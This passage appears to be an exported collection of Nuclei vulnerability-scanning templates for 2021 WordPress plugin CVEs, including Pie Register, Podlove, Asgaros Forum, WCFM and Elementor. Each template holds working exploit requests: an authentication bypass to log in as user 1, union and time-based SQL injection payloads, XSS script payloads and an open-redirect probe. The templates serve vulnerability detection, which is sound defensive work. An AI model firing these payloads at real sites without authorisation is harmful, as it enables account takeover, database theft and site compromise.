Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username\n impact: |\n An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information.\n remediation: Fixed in version 3.7.1.6\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24647\n - https://github.com/RandomRobbieBF/CVE-2021-24647\n - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2021-24647\n cwe-id: CWE-287\n epss-score: 0.22598\n epss-percentile: 0.96397\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /login/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/profile.php HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_1, \"pieregister\")'\n - 'contains(body_3, \"Username\") && contains(body_3, \"email-description\")'\n condition: and\n# digest: 4a0a004730450220204302541a5adc4eb84fc50fb71121e7140fda5e325560f2bc6af782c3aca218022100ab9e70ee88a95d91743d26f6f03d095cacd2446df954554ebd5977cd1815c210:922c64590222798bb761d5b6d8e72950", "hash": "e8181e1d8af358a7e644d3a6b3b886ee", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ca" }, "name": "CVE-2021-24666.yaml", "content": "id: CVE-2021-24666\n\ninfo:\n name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: Fixed in version 3.5.6.\n reference:\n - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe\n - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/\n - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24666\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24666\n cwe-id: CWE-89\n epss-score: 0.28174\n epss-percentile: 0.96727\n cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: podlove\n product: podlove_podcast_publisher\n framework: wordpress\n tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '66a82937a7660b73b00d4f7cefee6c85'\n - '\"service_id\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022026044c3717272e2e8420ed333438950d1278ecd387d98be83b17a4e221c88061022100f29de45026c0ac79f866c24c10ac02390cb7b01c5b01472839be278f0b677522:922c64590222798bb761d5b6d8e72950", "hash": "1b042987d7f36dc2590dadf17e149454", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cb" }, "name": "CVE-2021-24731.yaml", "content": "id: CVE-2021-24731\n\ninfo:\n name: Pie Register < 3.7.1.6 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 3.7.1.6\n reference:\n - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a\n - https://wordpress.org/plugins/pie-register/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24731\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24731\n cwe-id: CWE-89\n epss-score: 0.14786\n epss-percentile: 0.95651\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /wp-json/pie/v1/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"User credentials are invalid.\")'\n condition: and\n# digest: 4b0a00483046022100fce3161626802d300b9a7d01b3d0b39df2f76c16556c4cd0f1f0f331408796bf022100f4a95c3a1fee3e3a75c2105e41b3554e20ce5802440a244a4f7cab3280f3178f:922c64590222798bb761d5b6d8e72950", "hash": "90ea8fa00f6b0cadefd618d7573e7401", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cc" }, "name": "CVE-2021-24746.yaml", "content": "id: CVE-2021-24746\n\ninfo:\n name: WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting\n author: Supras\n severity: medium\n description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24746\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24746\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: heateor\n product: sassy_social_share\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/sassy-social-share\"\n tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan,heateor\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/posts\"\n - \"{{BaseURL}}/{{slug}}/?a"><script>alert(document.domain)</script>\"\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '?a\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: slug\n group: 1\n regex:\n - '\"slug\":\"([_a-z-A-Z0-9]+)\",'\n internal: true\n part: body\n# digest: 4a0a0047304502200993a9a2953aa772460c25d771fb5bc7793c9f97df213694a924f140c82564c2022100ee73b7aa4e200224d68aa207881162ef141bd75466b4b8a9c7973eb4706c3839:922c64590222798bb761d5b6d8e72950", "hash": "69972a34d91f803b459ee92dfc784d0d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cd" }, "name": "CVE-2021-24750.yaml", "content": "id: CVE-2021-24750\n\ninfo:\n name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection\n author: cckuakilong\n severity: high\n description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.\n reference:\n - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py\n - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de\n - https://plugins.trac.wordpress.org/changeset/2622268\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24750\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-24750\n cwe-id: CWE-89\n epss-score: 0.02112\n epss-percentile: 0.8802\n cpe: cpe:2.3:a:wp_visitor_statistics_\\(real_time_traffic\\)_project:wp_visitor_statistics_\\(real_time_traffic\\):*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wp_visitor_statistics_\\(real_time_traffic\\)_project\n product: wp_visitor_statistics_\\(real_time_traffic\\)\n framework: wordpress\n tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\\(real_time_traffic\\)_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dd8e2f1ed7e6ac787ddc76d145588e55c3e1af2729f0eb0f6652d1c52284da91022100d61e0a905aa5921060a0e2bc63fdba2790e30fdd1d29ed5d3763b2e491f9dda1:922c64590222798bb761d5b6d8e72950", "hash": "4b352ba8b5034de09a7d53722c0e156d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ce" }, "name": "CVE-2021-24762.yaml", "content": "id: CVE-2021-24762\n\ninfo:\n name: WordPress Perfect Survey <1.5.2 - SQL Injection\n author: cckuailong\n severity: critical\n description: |\n Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.\n remediation: |\n Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50766\n - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget\n - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24762\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24762\n cwe-id: CWE-89\n epss-score: 0.33888\n epss-percentile: 0.96671\n cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: getperfectsurvey\n product: perfect_survey\n framework: wordpress\n tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n\n - type: word\n part: header\n words:\n - \"wp-ps-session\"\n\n - type: status\n status:\n - 404\n# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950", "hash": "3192401fa47b1221903217dbeba6e647", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082cf" }, "name": "CVE-2021-24791.yaml", "content": "id: CVE-2021-24791\n\ninfo:\n name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection\n author: r3Y3r53\n severity: high\n description: |\n The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n remediation: Fixed in version 1.1.14\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24791\n - https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f\n - https://wordpress.org/plugins/header-footer-code-manager/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24791\n cwe-id: CWE-89\n epss-score: 0.10363\n epss-percentile: 0.94849\n cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: draftpress\n product: header_footer_code_manager\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-custom-pages/\"\n tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 20s\n GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2,\"Add New Snippet\")'\n condition: and\n# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950", "hash": "366eb059927bf21c654eb4d83dbcc022", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d0" }, "name": "CVE-2021-24827.yaml", "content": "id: CVE-2021-24827\n\ninfo:\n name: WordPress Asgaros Forum <1.15.13 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.\n remediation: |\n Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1\n - https://wordpress.org/plugins/asgaros-forum/\n - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24827\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24827\n cwe-id: CWE-89\n epss-score: 0.11843\n epss-percentile: 0.94798\n cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: asgaros\n product: asgaros_forum\n framework: wordpress\n tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"asgarosforum\")'\n condition: and\n# digest: 4a0a0047304502204abd65cd69b3643e17793039bcb1df79c03f29ed1e031e0ae09f57d30b48a2eb022100cb2c0863ead3cbed3b58da963a5fe5581155c01b4aebcc1a1bbfc5404a1a6a3b:922c64590222798bb761d5b6d8e72950", "hash": "c21ac89e7b221fb72880415bb116eb3e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d1" }, "name": "CVE-2021-24838.yaml", "content": "id: CVE-2021-24838\n\ninfo:\n name: WordPress AnyComment <0.3.5 - Open Redirect\n author: noobexploiter\n severity: medium\n description: |\n WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the execution of other malicious activities.\n remediation: |\n Update to the latest version of WordPress AnyComment plugin (0.3.5 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24838\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24838\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42838\n cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: bologer\n product: anycomment\n framework: wordpress\n tags: cve2021,cve,redirect,anycomment,wpscan,wordpress,wp-plugin,bologer\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh\"\n - \"{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100b49cb02f5e7f2e64f2ca2e050d6d61f31f4b28f27b4d952e4c4f44d672f31fc0022100ca970f8df5900aaa1bb963b0f20c63b05d6bb52089ee35b266d0c44cc1a9ed46:922c64590222798bb761d5b6d8e72950", "hash": "fc8633bc60980aeef2c620e4e41837bc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d2" }, "name": "CVE-2021-24849.yaml", "content": "id: CVE-2021-24849\n\ninfo:\n name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.\n remediation: Fixed in 3.4.12\n reference:\n - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24849\n - https://wordpress.org/plugins/wc-multivendor-marketplace/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24849\n cwe-id: CWE-89\n epss-score: 0.02367\n epss-percentile: 0.89583\n cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wclovers\n product: \"frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible\"\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/wc-multivendor-marketplace\"\n tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code == 200\n - contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")\n condition: and\n internal: true\n\n - raw:\n - |\n @timeout: 20s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n {{post_data}}\n\n payloads:\n post_data:\n - \"action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--\"\n - \"action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'duration>=5'\n - 'status_code == 200'\n - 'contains(header, \"application/json\")'\n - 'contains(body, \"success\")'\n condition: and\n# digest: 4b0a00483046022100ade9023a98f1e582ced87da228df4387a9351ee1bc7d0f80b959b1c01efe9301022100a724a4b3f7b0d2716fa368d0014ba7c027ba80d657109e06ec9571050764a3e9:922c64590222798bb761d5b6d8e72950", "hash": "86a1f345cb756058879c2adb43693b26", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d3" }, "name": "CVE-2021-24862.yaml", "content": "id: CVE-2021-24862\n\ninfo:\n name: WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n impact: |\n An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 5.0.1.6.\n reference:\n - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615\n - https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24862\n - http://packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html\n - https://github.com/ezelnur6327/ezelnur6327\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24862\n cwe-id: CWE-89\n epss-score: 0.72686\n epss-percentile: 0.97816\n cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: metagauss\n product: registrationmagic\n framework: wordpress\n tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=6'\n - 'status_code_2 == 200'\n - 'contains(body_3, \"rm_user_role_mananger_form\")'\n condition: and\n# digest: 4a0a00473045022100e291dd94c5d8a5cf0d02cbfdd5212108c69acd79b92db5c04881b59af89449040220781cf0b9c9e4ff06f64c490aaecc845f875e184b75df4413f58b712af3304d65:922c64590222798bb761d5b6d8e72950", "hash": "3e93ebe951bcc23db51ebf8ad77ebfc0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d4" }, "name": "CVE-2021-24875.yaml", "content": "id: CVE-2021-24875\n\ninfo:\n name: WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 3.0.39.\n reference:\n - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24875\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24875\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.50097\n cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: implecode\n product: ecommerce_product_catalog\n framework: wordpress\n tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\")'\n - 'contains(body_2, \"eCommerce Product Catalog\")'\n condition: and\n# digest: 4a0a0047304502210090b957beb8440eaf4acf667c971c051694c39e18b33a8a8b31ae16d36d5f56fa0220598145a711dd9feeef1155fb5654ff6abd36cc88b7decadc8e3ea432ed896fbf:922c64590222798bb761d5b6d8e72950", "hash": "1d7423a08bc0fe170813f01dfc480425", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d5" }, "name": "CVE-2021-24891.yaml", "content": "id: CVE-2021-24891\n\ninfo:\n name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: |\n WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability.\n reference:\n - https://www.jbelamor.com/xss-elementor-lightox.html\n - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24891\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24891\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.45185\n cpe: 